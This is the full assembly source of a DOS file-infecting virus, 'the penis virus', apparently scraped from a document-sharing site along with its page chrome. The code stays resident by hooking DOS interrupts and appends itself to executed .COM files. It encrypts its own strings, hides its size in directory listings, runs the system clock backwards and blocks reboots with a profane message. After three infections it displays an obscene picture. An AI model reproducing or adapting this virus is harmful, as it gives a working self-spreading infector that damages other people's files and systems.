Penis

;*****************************************************************************
;* the penis virus

;*
;*
;* by soltan griss [yam]
;*
;*
;*
;*
;* in no means was this intended to be a serious virus, i got bored one day
;* and decided to have some fun.
;*
;*
;* well here it is...
;*
;*****************************************************************************
seg_a segment
assume cs:seg_a,ds:seg_a,es:nothing
org 100h
start: db 0e9h,02,00,42h,0f2h
mov cx,(old_21-old_8) ;run first time only

mov si,offset old_8 ;encrypt all text messages
call crypter
mov cx,(exec-data)
mov si,offset data
call crypter
vstart equ $
call code_start
code_start:
pop si
sub si,offset code_start
mov bp,si
jmp load ;load in the tsr
;**************************************************************************
old_8 dw 0,0
new_8: push ax
push bx ;lets run the clock
push cx ;backwards
push ds
xor ax,ax
mov ds,ax
mov bx,ds:46ch
mov cx,ds:046eh
dec bx
jno loc_4
dec cx
jno loc_4
mov bx,0afh
mov cx,18h ;remember to do it twice
loc_4: ;cause the normal increase
dec bx ;will negate the first one
jno loc_5
dec cx
jno loc_5
mov bx,0afh
mov cx,18h
loc_5:
mov ds:046eh,cx
mov ds:046ch,bx
pop ds
pop cx
pop bx
pop ax
do_old_8: jmp dword ptr cs:[old_8-vstart]
;****************************************************************************
;int 9 handler
old_9 dd ? ;store old int 9
new_9:
push ax
in al,60h ;turn on register 60
cmp al,53h ;ctrl-alt-del
je fuck_you
pop ax
jmp dword ptr cs:[(old_9-vstart)]
say_it: db "fuck you asshole! ","$"
fuck_you:
push ds
push dx
mov ah,9h
push cs
pop ds
mov dx,say_it-vstart ;say message

int 21h
pop dx
pop ds
pop ax
iret
;***********************************************************************
;***********************************************************************
;***********************************************************************
;***********************************************************************
;***********************************************************************
old_21 dd ?
new_21:
cmp ax,4b00h ;are we executing?
je exec1
cmp ah,11h
je hide_size
cmp ah,12h
je hide_size
cmp ax,0f242h ;are we going resident?
jne do_old
mov bx,242fh ;set our residency byte
do_old: jmp dword ptr cs:[(old_21-vstart)] ;if not then do old int 21
exec1: jmp exec
do_dir: jmp dword ptr cs:[(old_21-vstart)]
ret
hide_size:
pushf
push cs
call do_dir ;get the current fcb
cmp al,00h
jnz dir_error ;jump if bad fcb
push ax
push bx
push es ;undocumented get fcb
mov ah,51h ;location
int 21h
mov es,bx ;get info from fcb
cmp bx,es:[16h]
jnz not_inf
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;get dta
int 21h
pop ax
inc al ;check for extended fcb
jnz normal_fcb
add bx,7h
normal_fcb:
mov ax,es:[bx+17h]
and ax,1fh
xor al,01h ;check for 2 seconds
jnz not_inf
and byte ptr es:[bx+17h],0e0h ;subtract virus size

sub es:[bx+1dh],(vend-vstart)
sbb es:[bx+1fh],ax
not_inf:pop es
pop bx
pop ax
dir_error:
iret ;back to caller
;***************************************************************************
;***************************************************************************
;* picture to display
;***************************************************************************
data db '?',4,'?',4,'?',4,'?',4,' ',4,' ',15,'?',4,' ',15,' '

db 15,' ',15,' ',15,'?',4,'?',4,'?',4,'?',4,' ',15,'?',4
db '?',4,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,'?',4
db '?',4,' ',15,' ',15,'?',4,' ',15,' ',15,' ',15,' ',15
db ' ',15,'?',4,' ',15,'?',4,'?',4,'?',4,'?',4,'?',64,'?'
db 64,' ',15,' ',0,' ',0,' ',0,' ',15,' ',0,' ',15,' ',15
db ' ',15,' ',15,' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',64,' ',15,' ',15,' ',15
db ' ',64,'?',64,' ',64,' ',15,' ',15,' ',15,' ',15,' ',64
db ' ',15,' ',15,' ',64,' ',15,' ',15,' ',64,'?',4,' ',15
db ' ',15,' ',15,' ',15,'?',4,' ',64,' ',4,' ',15,' ',15
db '?',4,'?',4,'?',4,' ',15,'?',64,' ',64,'?',4,' ',15,'?'
db 4,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' '
db 0,' ',0,' ',15,' ',0,' ',15,' ',15,' ',15,' ',15,' ',0
db ' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',64,'?',64,'?',64,'?',64,'?',64,'?',64,' '
db 64,' ',15,' ',15,' ',15,' ',15,' ',64,' ',15,' ',15,' '
db 64,' ',15,' ',15,' ',15,' ',64,'?',4,' ',64,' ',64,'?'
db 64,' ',64,' ',4,' ',15,' ',15,' ',15,'?',4,' ',15,'?'
db 4,'?',4,'?',4,' ',15,'?',4,' ',15,'?',4,'?',64,'?',64
db '?',64,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',15,' '
db 0,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0
db ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',64,'?',4
db '?',4,'?',4,'?',64,' ',15,' ',64,'?',4,'?',4,'?',4,' '
db 15,' ',64,'?',4,'?',4,' ',64,' ',15,' ',15,' ',15,' '
db 15,' ',64,' ',15,' ',15,' ',64,' ',15,' ',15,' ',15,' '
db 15,' ',15,'?',4,' ',15,' ',15,'?',4,' ',15,' ',15,'?'
db 4,' ',15,'?',4,'?',4,'?',4,'?',4,'?',64,'?',64,' ',15
db ' ',0,' ',0,' ',0,' ',15,' ',0,' ',15,' ',15,' ',15,' '
db 15,' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,'?',96,'?',96
db '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',0,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',96,' ',96,' ',96,' ',96,' ',103,' ',103
db ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103
db ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103
db ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103
db ' ',103,' ',103,'?',96,'?',96,'?',96,' ',96,'?',96,'?'
db 96,'?',96,'?',96,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,'?'
db 15,'?',15,'?',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',96,' ',96,' ',96
db ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103
db ' ',96,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103
db ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103
db ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,'?',96
db '?',96,'?',96,'?',96,' ',96,'?',96,'?',96,'?',15,'?',15
db '?',15,'?',15,'?',15,'?',15,' ',15,' ',15,' ',15,' ',15
db '?',15,'?',15,'?',15,'?',15,'?',15,'?',15,'?',15,' ',15
db ' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',96,' ',96,' ',96,' ',96,' ',103,' ',103,'?',96
db '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96
db '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96
db '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96
db '?',96,'?',96,'?',96,'?',96,' ',96,'?',96,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,'?',15,'?',15,'?',15,' ',15,' ',15
db ' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',96,' ',103,' ',103,' ',96,' ',96,' ',103,'?',96
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,'?',96,'?',96,'?',96,'?',96,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',103,' ',103,' ',103,'?',96,'?',96,'?',96,' '
db 103,'?',96,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',103,' ',103,'?',96,'?',96,'?',96,'?',96,' ',103
db '?',96,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',103,'?',96,'?',96,'?',96,'?',96,' ',103,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,'?',96,' ',103,' ',103,' ',103,'?',96,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',0,' ',0
db ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0
db ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0
db ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0
db ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0
db ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0
db ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
db ' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
db 0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
db 0,' ',0,' ',0,' ',0,' ',0,' ',0,' '
doggie db 15,'y',15,'o',15,'u',15,'r',15,' ',15,'f',15,'i',15,'l',15,'e'
db 15,' ',15,'h',15,'a',15,'s',15,' ',15,'j',15,'u',15,'s',15,'t'
db 15,' ',15,'b',15,'e',15,' ',15,'p',15,'e',15,'n',15,'i',15,'s'
db 15,'`',15,'i',15,'z',15,'e',15,'d',15,' ',15,'c',15,'o',15,'m'
db 15,'p',15,'l',15,'e',15,'m',15,'e',15,'n',15,'t',15,'s',15,' '
db 15,'o',15,'f',15,' ',15,' ',15,' '
db 0,' ',0,' ',15,' ',15,' ',15,' '
db 03,'[',03,'y',03,'a',03,'m'
db 03,']',03,'/',03,'9',03,'2'
db 03,' ',02,'-',04,'s',04,'.',04,'g',04,'r',04,'i',04,'s',04,'s'
db 04,' ',0,' ',0,' ',0,' ',0,' ',0
db ' ',0,' ',0,' ',0,' ',0,' ',0
;actual program begins here
exec:
push ax
push bx
push cx
push dx
push di
push si
push ds
push es
mov ax,4300h ;get file attributes

int 21h
jc long_cock
and cl,0feh ;make it read/write

mov ax,4301h
int 21h
jc long_cock
infect:
mov ax,3d02h
int 21h
jc long_cock
mov bx,ax
push ds
push cs
pop ds
mov ah,3fh
mov cx,5h
mov dx,(buffer-vstart) ;load in the first 5 bytes
int 21h
jc long_cock
cmp word ptr cs:[(buffer-vstart)],5a4dh ;check to see if its an

je long_cock ;exe
cmp word ptr cs:[(buffer-vstart)+3],42f2h

je long_cock ;check to see if f242 tag
;if so then its infected
jmp next
long_cock:
jmp cocker2
next:
mov ax,5700h
int 21h
mov word ptr cs:[(old_time-vstart)],cx ;get the files time

mov word ptr cs:[(old_date-vstart)],dx ;and date
mov ax,4202h ;move file pointer to end

xor cx,cx ;top get the files size
xor dx,dx
int 21h
jc long_cock
mov cx,ax
sub cx,3 ;sub 3 form jump at begining
mov word ptr cs:[(jump_add+1-vstart)],cx;save length in jmp commmand
mov cx,(old_21-old_8) ;number of bytes to encrypt before writing

mov si,(old_8-vstart)
call crypter
mov cx,(exec-data)
mov si,(data-vstart)
call crypter
mov ah,byte ptr cs:[(infect_times-vstart)]

mov byte ptr cs:[(infect_times-vstart)],00h
push ax
mov cx,(vend-vstart) ;write the virus to the end

mov ah,40h ;of the file
xor dx,dx
int 21h
jc cocker
pop ax
inc ah
mov byte ptr cs:[(infect_times-vstart)],ah ;counter
mov cx,(exec-data)
mov si,(data-vstart) ;decrypt data
call crypter
mov cx,(old_21-old_8) ;number of bytes to decrypt after writing

mov si,(old_8-vstart)
call crypter
mov ax,4200h ;move file pointer to the

xor cx,cx ;begining to write the jmp
xor dx,dx
int 21h
mov cx,5
mov ah,40h ;write the jmp top the file
mov dx,(jump_add-vstart)
int 21h
jc cocker
mov ax,5701h
mov word ptr cx,cs:[(old_time-vstart)] ;restore old time,date
mov word ptr dx,cs:[(old_date-vstart)]
and cl,0e0h
inc cl ;change seconds to 2
int 21h
mov ah,3eh
int 21h
jmp show_dick
cocker: jmp cocker2
show_dick:
cmp byte ptr cs:[(infect_times-vstart)],03h

jl cocker
mov ah,0fh ;get current video mode

int 010h
cmp al,7 ;is it a monochrome mode?
jz mono ;yes
mov ax,0b800h ;color text video segment
jmp short doit
mono: mov ax, 0b000h ;monochrome text video segment
doit: mov es,ax
push cs
pop ds
mov si,data-vstart ;load destination offset
xor di,di ;clear destination index
counter
mov cx,(exec-data+1)/2
rep movsw ;write to video memory
mov ah,02h ;hide cursor

mov bh,0 ;assume video page 0
mov dx,1a00h ;moves cursor past bottom of
screen
int 010h
lup: mov ah, 01h
int 016h
jz lup
mov ah,0
int 016h
;clear the screen

mov ah, 6 ;function 6 (scroll window up)
mov al, 0 ;blank entire screen
mov bh, 7 ;attribute to use
mov ch, 0 ;starting row
mov cl, 0 ;starting column
mov dh, 25 ;ending row
mov dl, 80 ;ending column
int 10h ;call interrupt 10h
mov ah,02h ;puts cursor back where it belongs

mov bh,0 ;assume video page 0
mov dx,0
int 010h
cocker2:pop ds
pop es
pop ds
pop si ;go back to old int 21
pop di
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[(old_21-vstart)]
old_date dw 0
old_time dw 0
buffer: db 0cdh,20h,00
buffer2 db 0,0
infect_times: db 0h
jump_add: db 0e9h,00,00,0f2h,42h;
;***********************************************************************
;***********************************************************************
;***********************************************************************
;***********************************************************************
;***********************************************************************
exit2: jmp exit

crypter:
push ax ;encryptor routine
loo: mov ah,byte ptr cs:[si] ;move byte into ah
xor ah,0aah ;xor it
mov byte ptr cs:[si],ah ;write it back
inc si
loop loo
pop ax
ret
load: mov ax,0f242h ; check to see if we are

int 21h ; allready resident
cmp bx,0242fh ; looking for f242 tag
je exit2
mov cx,(old_21-old_9) ;number of bytes to decrypt

mov si,offset old_9
add si,bp
call crypter
mov cx,(exec-data) ;number of bytes to decrypt

mov si,offset data
add si,bp
call crypter
dec_here:
push cs
pop ds
mov ah,49h ;release current memory block

int 21h
mov ah,48h ;request hugh size of memory

mov bx,0ffffh ;returns biggest size
int 21h
mov ah,4ah
sub bx,(vend-vstart+15)/16+1 ;subtract virus size
jc exit2
int 21h
mov ah,48h
mov bx,(vend-vstart+15)/16 ;request last xxx pages
int 21h ;allocate it to virus
jc exit2
dec ax
push es
mov es,ax
mov byte ptr es:[0],'z' ;make dos the owner

mov word ptr es:[1],8
mov word ptr es:[3],(vend-vstart+15)/16 ;put size here
sub word ptr es:[12h],(vend-vstart+15)/16 ;sub size from current
;memory
inc ax
lea si,[bp+offset vstart] ;copy it to new memory block
xor di,di
mov es,ax
mov cx,(vend-vstart+5)/2
cld
rep movsw
xor ax,ax
mov ds,ax
push ds
lds ax,ds:[21h*4] ;swap vectors manually
mov word ptr es:[old_21-vstart],ax
mov word ptr es:[old_21-vstart+2],ds
pop ds
mov word ptr ds:[21h*4],(new_21-vstart)
mov ds:[21h*4+2],es
xor ax,ax
mov ds,ax
push ds
lds ax,ds:[9h*4]
pop ds
mov ds:[9h*4+2],es
xor ax,ax
mov ds,ax
push ds
lds ax,ds:[8h*4]
pop ds
mov ds:[8h*4+2],es
push cs
pop ds
exit:
push cs
pop es
; now got to copy it back......

mov cx,5
mov si,offset buffer ;copy it back and run original
add si,bp ;program
mov di,100h
repne movsb
mov bp,100h
jmp bp
vend equ $
seg_a ends
end start

Penis

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Penis

Uploaded by

Copyright:

Available Formats

;*****************************************************************************

;* the penis virus

mov cx,(old_21-old_8) ;run first time only

old_9 dd ? ;store old int 9

say_it: db "fuck you asshole! ","$"

mov dx,say_it-vstart ;say message

and byte ptr es:[bx+17h],0e0h ;subtract virus size

data db '?',4,'?',4,'?',4,'?',4,' ',4,' ',15,'?',4,' ',15,' '

mov ax,4300h ;get file attributes

and cl,0feh ;make it read/write

cmp word ptr cs:[(buffer-vstart)],5a4dh ;check to see if its an

cmp word ptr cs:[(buffer-vstart)+3],42f2h

mov word ptr cs:[(old_time-vstart)],cx ;get the files time

mov ax,4202h ;move file pointer to end

mov cx,(old_21-old_8) ;number of bytes to encrypt before writing

mov ah,byte ptr cs:[(infect_times-vstart)]

mov cx,(vend-vstart) ;write the virus to the end

mov cx,(old_21-old_8) ;number of bytes to decrypt after writing

mov ax,4200h ;move file pointer to the

cmp byte ptr cs:[(infect_times-vstart)],03h

mov ah,0fh ;get current video mode

mov ah,02h ;hide cursor

;clear the screen

mov ah,02h ;puts cursor back where it belongs

jmp dword ptr cs:[(old_21-vstart)]

exit2: jmp exit

load: mov ax,0f242h ; check to see if we are

mov cx,(old_21-old_9) ;number of bytes to decrypt

mov cx,(exec-data) ;number of bytes to decrypt

mov ah,49h ;release current memory block

mov ah,48h ;request hugh size of memory

mov byte ptr es:[0],'z' ;make dos the owner

; now got to copy it back......

You might also like